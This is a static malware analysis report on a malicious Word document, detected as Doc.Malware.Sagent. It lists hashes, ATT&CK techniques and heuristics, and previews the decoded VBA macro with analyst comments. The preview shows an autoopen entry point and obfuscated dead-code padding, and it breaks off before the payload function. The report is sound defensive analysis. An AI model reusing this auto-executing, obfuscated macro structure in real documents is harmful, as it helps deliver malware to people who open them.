Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ea0e26084bc2c5a…

MALICIOUS

Office (OLE)

Size: 166.2 KB · Created: 2019-04-05 19:59:00 · Authoring application: Microsoft Office Word · First seen: 2019-04-21
MD5: 659959921c61d5ca9f4e43b2cfd4c7d1 SHA-1: db95b66f3a5c38855b136c2fb602c37d1a2b2dff SHA-256: 2ea0e26084bc2c5abcdc83efc8dd5f1071f44e7975c79e125cd441b314bfdac5
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment; T1059 Command and Scripting Interpreter

The file is identified as malicious by ClamAV and exhibits high-severity heuristics indicating the presence of an AutoOpen VBA macro that uses GetObject for execution. The VBA macro code is heavily obfuscated but its structure and the presence of execution-related heuristics suggest it is designed to download and execute a secondary payload. The document's metadata indicates it was authored by Microsoft Office Word, and the presence of VBA macros points to a macro-based attack vector.

Heuristics 7

  • ClamAV: Doc.Malware.Sagent-6932497-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6932497-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches macro documents that are p-code-only or whose source extraction failed, i.e. where no visible source is available.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface, not, by itself, an attribution to a downloader or a parser CVE. (For this sample a decoded VBA project was in fact recovered — see Extracted artifacts below — so this marker corroborates rather than replaces the VBA findings above.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard OOXML schema namespace identifier embedded in document content, not a host the macro contacts; it carries no indicator value on its own.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35843 bytes
SHA-256: 323682ee3ae0b2b1cd78aa0a85c91f4cea6d7b7f0a48dedf7e8dad061f610acb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FAABDADA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header only — no procedures follow in the decoded source.
' VB_Base = "1Normal.ThisDocument" suggests this is the document's ThisDocument
' class module (presumably renamed by the obfuscator); nothing executable here.

Attribute VB_Name = "hZUoXUcA"
Attribute VB_Base = "0{0044E13D-6B39-4E0E-8329-458B160CB026}{704E36E8-FD0D-413C-BF71-B2E93F29FB33}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: header of a second module with no code in the decoded source.
' The GUID-pair VB_Base is the form usually seen on UserForm modules — TODO confirm
' against the OLE stream listing; no executable statements are present here.

Attribute VB_Name = "qZAQCAo"
Attribute VB_Base = "0{011C69D3-5269-45E0-B02C-1420E620B63B}{62E10972-9CE7-472C-9CD1-42AE75DFAC16}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note: third module header, again with no procedures in the decoded
' source. Same GUID-pair VB_Base shape as hZUoXUcA (presumably another UserForm;
' unconfirmed). Not part of the execution path visible in this preview.

Attribute VB_Name = "VcAwAXA"
' Analyst note: standard code module (no VB_Base line). It holds the autoopen
' entry point plus two functions of never-executed padding (HADBC_, Yo_QQA).
' Analyst note: dead-code padding. Every If below compares two unequal integer
' literals, so none of the assignments can execute; the operand names
' (LA4ADQA, NAcAcA, ...) are not declared anywhere in the visible source and
' no Option Explicit is visible. The function never sets a return value.
' Presumably present to inflate the module and defeat simple heuristics.
Function HADBC_()
   ' 442254873 <> 499686504 — branch is unreachable.
   If 442254873 = 499686504 Then
      b_C_cD = 557832723 + Hex(LA4ADQA) + 538712391 / NAcAcA * (QG1DwQAG * CSng(61118027 / CByte(pUAUwUQU)) - zo4AAAAQ - Sqr(QBXwA1BD / 73938180 + 144019114 + CDate(VABQAXQ4 - Sgn(201613861) + wAAUAAXU * 146645847))) + (891176315 + 61339754 + 484509555 * KoCBUA)
End If
   ' 316993078 <> 507198048 — branch is unreachable.
   If 316993078 = 507198048 Then
      bBDDAA = 636959852 + Hex(FQABoQ) + 289853246 / GAcDUAGA * (MAQk_A * CSng(258629473 / CByte(VZAAXU)) - lDCBwQ4 - Sqr(QA_CGGAQ / 434076849 + 729545492 + CDate(uAAAwow - Sgn(97153239) + VAoCAQwx * 913110675))) + (167757396 + 748495757 + 640735135 * wAABoDQC)
End If
   ' 851913475 <> 903381327 — branch is unreachable.
   If 851913475 = 903381327 Then
      qCQcCDD = 586780513 + Hex(CA4DAXA) + 117818655 / BUBcx4cX * (FBAoA4C * CSng(478473590 / CByte(p4QkAAA)) - GBAZQA - Sqr(oCADAA / 461366938 + 436412164 + CDate(mAXwBA - Sgn(45513629) + zAB1BDo * 209613792))) + (654083735 + 373494509 + 334400110 * L_AZAA)
End If
End Function
' Analyst note: auto-execution entry point — this is the AutoOpen macro flagged
' by the OLE_VBA_AUTOOPEN heuristic; Word invokes it when the document is
' opened with macros enabled. Its only statement calls tkAAB4D_, defined in
' module FxBwUC4Q below (that function's body is cut off in this preview), so
' the real behaviour of the document lives there, not in this Sub.
Sub autoopen()
tkAAB4D_
End Sub
' Analyst note: dead-code padding with the same shape as HADBC_. Each If tests
' two unequal integer literals, so the assignments are unreachable; the operand
' names are undeclared in the visible source and no return value is ever set.
' Nothing in the visible source calls this function.
Function Yo_QQA()
   ' 274942884 <> 17039148 — unreachable.
   If 274942884 = 17039148 Then
      dGA_AoX = 361563368 + Hex(ZABAG_Z) + 483864198 / KZwQBD * (zXDk1BDZ * CSng(197868115 / CByte(MACAU1)) - iUcCQAZA - Sqr(K4c_AAA / 273878866 + 374207182 + CDate(mA1cXk_A - Sgn(766582653) + n4ADcA * 587690647))) + (466297411 + 802991783 + 695342327 * zoAQXQ)
End If
   ' 137002513 <> 546200468 — unreachable.
   If 137002513 = 546200468 Then
      TGAZQQ = 529831822 + Hex(YABDAwQ) + 611028127 / PACBQAQB * (uBUAUk_ * CSng(204333742 / CByte(oUAXxo)) - CABA_B - Sqr(WADBxwDA / 654082578 + 906315897 + CDate(TAAABBA4 - Sgn(689515842) + jQAZAA_k * 563115738))) + (98684719 + 969116289 + 673525409 * uABDUQkB)
End If
   ' 458352785 <> 885888611 — unreachable.
   If 458352785 = 885888611 Then
      kQXUA_AA = 737674241 + Hex(W__CcA) + 68097222 / KcAQ4_ * (pwBUX4 * CSng(619921805 / CByte(GZcA1k)) - Q_AAkQU - Sqr(dUAAAUA / 40213486 + 520610438 + CDate(wwoBAA - Sgn(764491278) + HABxX1c * 232653729))) + (688426948 + 674333135 + 439441484 * kxAAAA)
End If
End Function

Attribute VB_Name = "FxBwUC4Q"
' Analyst note: standard code module. Contains more padding (OAcBDAA_) and
' tkAAB4D_, the function that autoopen calls — the one worth examining.
' Analyst note: dead-code padding, identical in shape to HADBC_ and Yo_QQA.
' The literal comparisons are all false, so no assignment executes, the operand
' names are undeclared in the visible source, and no return value is set.
' Not referenced by autoopen; safe to ignore when tracing the execution path.
Function OAcBDAA_()
   ' 988491044 <> 553866613 — unreachable.
   If 988491044 = 553866613 Then
      c1cD1A = 127125920 + Hex(D_1AAA) + 213181095 / wAUQcXCD * (jBUAcxDD * CSng(574265294 / CByte(MAAA_QA)) - XCxD4X4Q - Sqr(HXAA_wDA / 315555780 + 138702418 + CDate(h1ZUQG_Q - Sgn(669613157) + dDAAABQU * 577118532))) + (74478579 + 801686305 + 896028479 * zBDDXCcU)
End If
   ' 650451380 <> 278278148 — unreachable.
   If 650451380 = 278278148 Then
      WBBkcA = 541609089 + Hex(wABAQAcQ) + 905932752 / LDQ_GAD * (fAAAxcA * CSng(580416402 / CByte(fAAAZAZD)) - joAAkAA - Sqr(WAA_QXA / 761349395 + 317246653 + CDate(pA1kAUQA - Sgn(285815372) + dB_AUA * 810258521))) + (120063079 + 226902755 + 652279142 * qAAAAB)
End If
   ' 963336529 <> 380138346 — unreachable.
   If 963336529 = 380138346 Then
      l1AAXkGA = 289588896 + Hex(fAxoAwQA) + 649286081 / TBX_woQ * (dAXUkB * CSng(847862891 / CByte(ZQAAZAo)) - z_XABB - Sqr(JUAAQxB1 / 145973512 + 846648216 + CDate(nBUQ_Ao - Sgn(870063914) + B41BAAB * 237451039))) + (178705871 + 636963956 + 162988368 * HwGUZAA)
End If
End Function
Function tkAAB4D_()
On Error Resume Next
   If 260739108 = 553494848 Then
      TA_kBU = 490469089 + Hex(BA1o_x1) + 555606718 / SkAADA * (AXDoCA * CSng(419488025 / CByte(JAw1xDBZ)) -
... (truncated)